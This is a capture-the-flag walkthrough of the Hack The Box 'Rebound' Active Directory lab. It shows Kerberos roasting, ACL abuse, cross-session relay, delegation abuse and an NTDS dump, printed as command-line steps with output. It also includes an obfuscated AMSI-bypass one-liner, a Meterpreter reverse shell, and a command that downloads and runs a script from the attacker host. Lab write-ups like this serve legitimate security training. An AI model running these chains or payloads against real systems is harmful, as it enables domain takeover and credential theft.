HTB - Rebound
Description
Rebound is an Insane Windows machine featuring a tricky Active Directory environment. User enumeration via RID cycling reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. Weak ACLs are abused to obtain access to a group with FullControl over an OU, performing a Descendant Object Takeover (DOT), followed by a ShadowCredentials attack on a user with winrm access. On the target system, cross-session relay is leveraged to obtain the NetNTLMv2 hash of a logged-in user, which, once cracked, leads to a gMSA password read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-Based Constrained Delegation (RBCD) is used to impersonate the Domain Controller, enabling a DCSync attack, leading to fully elevated privileges.
Enumeration
IP Address: 10.10.11.231
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p53,88,135,139,389,445,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-31 20:41:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-31T20:43:17+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-time:
| date: 2024-10-31T20:41:42
|_ start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and requiredSummary
* Open ports: 53,88,135,139,445,5985
* UDP open ports: 53,88,123,389
* Services: DNS - RPC - SMB - KERBEROS - LDAP - NTP - winRM
* Important notes: DNS:dc01.rebound.htb - Domain: rebound.htbBefore I start, I'd prefer to update /etc/hosts file to prevent further issues and to easily communicate with the box without typing the IP each time.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo sh -c "echo '$ip dc01 dc01.rebound.htb rebound.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $tail -n1 /etc/hosts
10.10.11.231 dc01 dc01.rebound.htb rebound.htbService Enumeration
DNS Enumeration
It's always good to try Zone transfer, but it hardly-ever succeeds
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $dig axfr @10.10.11.231 dc01.rebound.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.10.11.231 dc01.rebound.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.RPC & SMB Enumeration
I didn't get anything interesting from RPC, SMB would be the next
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
result was NT_STATUS_ACCESS_DENIEDI can see, I have Read access on Shared share but unfortunately it's empty
─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --shares
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 [*] Enumerated shares
SMB 10.10.11.231 445 DC01 Share Permissions Remark
SMB 10.10.11.231 445 DC01 ----- ----------- ------
SMB 10.10.11.231 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.231 445 DC01 C$ Default share
SMB 10.10.11.231 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.231 445 DC01 NETLOGON Logon server share
SMB 10.10.11.231 445 DC01 Shared READ
SMB 10.10.11.231 445 DC01 SYSVOL Logon server share
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $impacket-smbclient rebound.htb/'guest':''@dc01
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use Shared
# ls
drw-rw-rw- 0 Fri Aug 25 17:46:36 2023 .
drw-rw-rw- 0 Fri Aug 25 17:46:36 2023 ..When attempting RID brute with an anonymous login, It failed but succeeded with guest account.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --rid-brute 10000
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --rid-brute 10000
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser)
SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser)
SMB 10.10.11.231 445 DC01 512: rebound\Domain Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 513: rebound\Domain Users (SidTypeGroup)
SMB 10.10.11.231 445 DC01 514: rebound\Domain Guests (SidTypeGroup)
SMB 10.10.11.231 445 DC01 515: rebound\Domain Computers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 516: rebound\Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 517: rebound\Cert Publishers (SidTypeAlias)
SMB 10.10.11.231 445 DC01 518: rebound\Schema Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 519: rebound\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 520: rebound\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.231 445 DC01 521: rebound\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 522: rebound\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 525: rebound\Protected Users (SidTypeGroup)
SMB 10.10.11.231 445 DC01 526: rebound\Key Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 527: rebound\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 553: rebound\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.231 445 DC01 571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.231 445 DC01 572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.231 445 DC01 1000: rebound\DC01$ (SidTypeUser)
SMB 10.10.11.231 445 DC01 1101: rebound\DnsAdmins (SidTypeAlias)
SMB 10.10.11.231 445 DC01 1102: rebound\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.231 445 DC01 1951: rebound\ppaul (SidTypeUser)
SMB 10.10.11.231 445 DC01 2952: rebound\llune (SidTypeUser)
SMB 10.10.11.231 445 DC01 3382: rebound\fflock (SidTypeUser)
SMB 10.10.11.231 445 DC01 5277: rebound\jjones (SidTypeUser)
SMB 10.10.11.231 445 DC01 5569: rebound\mmalone (SidTypeUser)
SMB 10.10.11.231 445 DC01 5680: rebound\nnoon (SidTypeUser)
SMB 10.10.11.231 445 DC01 7681: rebound\ldap_monitor (SidTypeUser)
SMB 10.10.11.231 445 DC01 7682: rebound\oorend (SidTypeUser)
SMB 10.10.11.231 445 DC01 7683: rebound\ServiceMgmt (SidTypeGroup)
SMB 10.10.11.231 445 DC01 7684: rebound\winrm_svc (SidTypeUser)
SMB 10.10.11.231 445 DC01 7685: rebound\batch_runner (SidTypeUser)
SMB 10.10.11.231 445 DC01 7686: rebound\tbrady (SidTypeUser)
SMB 10.10.11.231 445 DC01 7687: rebound\delegator$ (SidTypeUser)I added the users I found to a wordlist to use it later
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $cat wordlists/users.list
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
ServiceMgmt
winrm_svc
batch_runner
tbrady
delegator$LDAP & Kerberos Enumeration
I tried to query ldap anonymously but got nothing from it.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $ldapsearch -H ldap://10.10.11.231 -x -s sub '*' -b "DC=rebound,DC=htb"
# LDAPv3
# base <DC=rebound,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: *
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563The last option now is Kerberos. With my usernames list, I can try two possible attacks, one common and one new to many people.
ASREP-Roasting AttackKerberosting via asreproastable account
nxc ldap dc01 -u wordlists/users.list -p '' --asreproast asrep.hashes
Unluckily, cracking the hash failed which made me move to the next possible attack
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
..snip..
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:812fbf1df8bffa65dd...2a6157To perform this attack, we need the latest version of Impacket
mkdir impacket && cd impacket
python3 -m venv . && source ./bin/activate
pip3 install impacketThis is the option we need
Foothold
I will try to get some hashes and if succeed, I will output them to a file.
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebount.htb
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebount.htb -output kerberos.hashes
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 13100 kerberos.hashes /usr/share/wordlists/rockyou.txt
..snip..
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$8ebcdf0e97d1de0fd18f1bd980841c97$e9d2eb41eead735aaf2a6ccd8eb3882380a2aaec21fa7a6ecea8380ebef4fd18b505a84caaf3976620b5fbd032007a6f23252bad48766d656bc03d3e2606ef901838357db952de0ac676d9890ac1b045e1a78ee3545ac0f4012fca682ce2779becd3ea481d559afb34cbe4c3807daf7f2d3e72febba1cd66756043f1dc63322a0b860f53a254b97e22efc02adcf20e861761b054023b3d7037dd6ff85e71bb6569b289c8dfc3aa29064b24e2668b346eaaa6830690e9d2f39db1ca4dc958f56221d0d3868915a258556b45647b3e77a0afbd552c6a66a7611d9132217e8d8500808d08ea0243c1754d55c6ee817d49ce4f7621e0603cc65a2c653137fd79808a2998a4a0a2d9c74629429b6334ac6a896e8e8192c642a2df9519a6cdf61db8ea3b7c70065d3548736274a89a9ca5552a3fdf06d69ce6c45eb11a6a38e0c8ad920574f0adbbe535227037e6c94043d5147723fb7b941bb29ffa8214d95476b1193fd6a91e1cb39ffb4758f198e13992d31c4c676b82d51174234392f64979e66dd506738e29048b27bf6310f2e73c7bdb8ce35b57fc7cb3c1374eed517fc83fdc51ae6de05b287ae3e25f802c364fc7a5d7cfa05711f3c97ccf8f3a64c4dc292859a90947aef6b5d1211de7f116e3aae597683e94d04f3617ca71c62986a6841a9279574c81d4964ac5858ece2086fb7bf5a3cd1913d3d18067ba230e09b7e5a24d359dd78d55ef6379a6eb17899fef7d61b9a08d7f9ebcbcdb23ff03374bbb0847d5038f99a71ddb29a5c701e50c95eea1e2f60648f4da03a3a7bc3b4849043a81ac4581a1394d9adc027b896b737dc37b20cbf7455333d6893dc9609fabc60eca77ea365c9a11296032bb47fdcabb5ccc54d5badeaca04b83c7316a75acb18df6cb38b497c8fa633caf48625577966fabb6e3f4c57c4707264c5f440d42e09f5857b138a64277616900b87dd1f635418f801e8495a6c7f03c22c62810c079d234e6ab852bc668d8d341a5ea8f3ac80daefa223586b2aa617b51cab39dc99ed4ca0ba510a296c4702b64b2326d0e0063e94d21fe697c1170ddf51c7ad5ddfc68f459ec242f5a23f4c3a4db66b30a439162e5838a1599f3de591df34e16bfd2aaaa583cd8f82bbfbacd6ba48eeecef121156689a72e5cd4cee5c16f0e8863ba4278fc588317114736229443767f97a8c44a63f4f90c2c003ba5973deee28b8f17a2708ef0ff4be67699089487effe72b484ecabbe98ac8cdfde17bee572f6fdc12eb83cc43c1fd2e65c103d98e7b1f17b443523f2c4e35d565eb38671598b59026378875380e9f3c9fb9ac25360c96b64b9bb315f87455c973334ca40d2cb7219c6ba:1GR8t@$$4u
Session..........: hashcat
Status...........: CrackedLet's check the validity of these credentials. Authentication to smb worked but LDAP failed
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u ldap_monitor -p '1GR8t@$$4u'
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
┌──[kali@parrot]─[~/HackTheBox/platform/machines/Rebound/ldapdomaindump]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u'
LDAPS 10.10.11.231 636 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u
LDAPS 10.10.11.231 636 DC01 [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.It looks like it needs Kerberos authentication to be enforced, I will try again with -k
I faced kerberos clock skew problem and didn't work with common solutions, so I write this script to sync with kerberos each second. "Not the best way, but it worked :)"
while True;do ntpdate 10.10.11.231;sleep 1;done
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u' -k
LDAPS dc01 636 DC01 [+] rebound.htb\ldap_monitor With valid domain credentials, I can move to the the domain enumeration process, credentialed enumeration against LDAP, smb, and try password spray. I will start with bloodhound.py
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $bloodhound-python -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' -ns 10.10.11.231 -d rebound.htb --zip -k
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: Done in 00M 42S
INFO: Compressing output into 20241031191948_bloodhound.zipLateral Movement
I found that two users shared the same passwords and the third was group not user.
Looking at permission on shares and files inside with spider_plus module but nothing interesting. I will enumerate the domain manually with PowerView.py
(powerview.py) ┌─[kali@parrot]─[/opt/powerview.py]
└──╼ $python3 powerview.py rebound.htb/ldap_monitor:'1GR8t@$$4u'@10.10.11.231 -k
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainUser -Identity oorend -Properties name,ObjectSid
name : oorend
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7682
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2024-10-31 19:46:49] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)User oorend has AddSelf to ServiceMgmt groups, So I'm curious to see the ACLs of this group I found that it had FullControl over Organisational unit (OU) Service Users
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7683
[2024-10-31 19:48:50] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : None
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : 0xf01ff
InheritanceType : None
SecurityIdentifier : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -SearchBase "OU=Service Users,DC=rebound,DC=htb" -Select ObjectDN
..snip..
CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
..snip..When enumerating the Domain object under this OU, I found that it contains winrm_svc account who is a member of Remote Management users, So he can access the machine via winRM
The Exploitation path is: Abuse AddSelf => Abuse FullControl Inhertiance => ChangePassword of winrm_svc or shadow Credentials
python3 powerview.py rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231 -k
Add-DomainGroupMember -Identity "ServiceMgmt" -Members oorendAdd-DomainObjectAcl -TargetIdentity "OU=Service Users,DC=rebound,DC=htb" -PrincipalIdentity oorend -Rights fullcontrol
or
./bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --dc-ip 10.10.11.231 -k --host dc01.rebound.htb add genericAll "OU=Service Users,DC=rebound,DC=htb" oorend
Set-DomainUserPassword -Identity winrm_svc -AccountPassword 'NewPass@w0rd123!!'
Or
net rpc password winrm_svc 'NewPass@w0rd123!!' -U rebound.htb/oorend%'1GR8t@$$4u' -S 10.10.11.231
Access the machine
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $evil-winrm -i dc01 -u winrm_svc -p 'NewPass@w0rd123!!'
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>User Flag: 46bad1cb1f3b5f3da2945c6f38c92c7c
Privilege Escalation
The password and ACLs are resettled, So I must harry and establish persistent shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=443 -f psh -o shell.ps1
sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.3;set lport 443;set payload windows/x64/meterpreter/reverse_tcp; run'
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
iex(iwr -UseBasicParsing 10.10.16.3/shell.ps1)After getting a shell in metasploit, I want to query logged-on users but it didn't give me anything, However when using logon type 9 (network logon), it shows that tbrady user is logged on.
Looking into Bloodhound for the privileges of that use, I found that it can read GMSA account hash
To get this account, I can use cross-sessionattack, steal its NTLMv2 hash, and try to crack it.
I used this repo to perform the attack: antonioCoco/RemotePotato0: Windows Privilege Escalation from User to Domain Admin.
Following this repo instruction, I get these two commands.
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 &
.\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.3 -p 9999
Trying to crack the hash using hashcat and succeeded :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 5600 hashes/ntlmv2.hash /usr/share/wordlists/rockyou.txt
TBRADY::rebound:0a5c6a4a69ec25ec:45e00b50ae6b1770ce5783b45df11a7b:010100000000000015d8a3db012cdb015057b803f05c13760000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080015d8a3db012cdb0106000400060000000800300030000000000000000100000000200000be29ef78de83964dfabe9aac638f7dda5b4d0fcbeaa670fed3addf513a647f820a00100000000000000000000000000000000000090000000000000000000000:543BOMBOMBUNmanda
Session..........: hashcat
Status...........: CrackedNow, I can read GMSA hash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u TBRADY -p '543BOMBOMBUNmanda' --gmsa -k
LDAPS dc01 636 DC01 [+] rebound.htb\TBRADY:543BOMBOMBUNmanda
LDAPS dc01 636 DC01 [*] Getting GMSA Passwords
LDAPS dc01 636 DC01 Account: delegator$ NTLM: ed8d95b20400dce3355419f277d3421cI want to enumerate the delegate of the account delegator$
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $findDelegation.py rebound.htb/'delegator$'@dc01 -hashes :ed8d95b20400dce3355419f277d3421c -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb NoFrom here, I stopped and couldn't go any further. the constrained delegation here is for http service and I couldn't request a ticket impersonating the administrator or the DC01, So the following attack path is very complicated and I will try to simplify it as I can.
Since I already have control of
delegator$account, I can performRBCDand addldap_monitortoms-ds-allowtoactonbehalfofotheridentitylist, soldap_monitorcan impersonate any user in the domainRequesting Service Ticket as
ldap_monitorimpersonating theDC01, so the ticket will haveforwardableflagUsing this ticket to request another ticket instead of
s4u2selfand impersonate the DC
rbcd.py 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps
findDelegation.py 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :ed8d95b20400dce3355419f277d3421c
getST.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate 'DC01$'
getST.py -spn http/dc01.rebound.htb -impersonate 'DC01$' 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -additional-ticket 'DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'Dumping ntds.dit secrets
(impacket) ┌─[✗]─[kali@parrot]─[/opt/impacket/bin]
└──╼ $nxc smb dc01 -k --use-kcache --ntds --user administrator
SMB dc01 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB dc01 445 DC01 [+] rebound.htb\DC01$ from ccache
SMB dc01 445 DC01 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc01 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc01 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::Access the machine as an administrator
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
56bf9cc0fa746883f65axxxxxxxxxxxxxRoot Flag: 56bf9cc0fa746883f65ab822f3ceb779
Last updated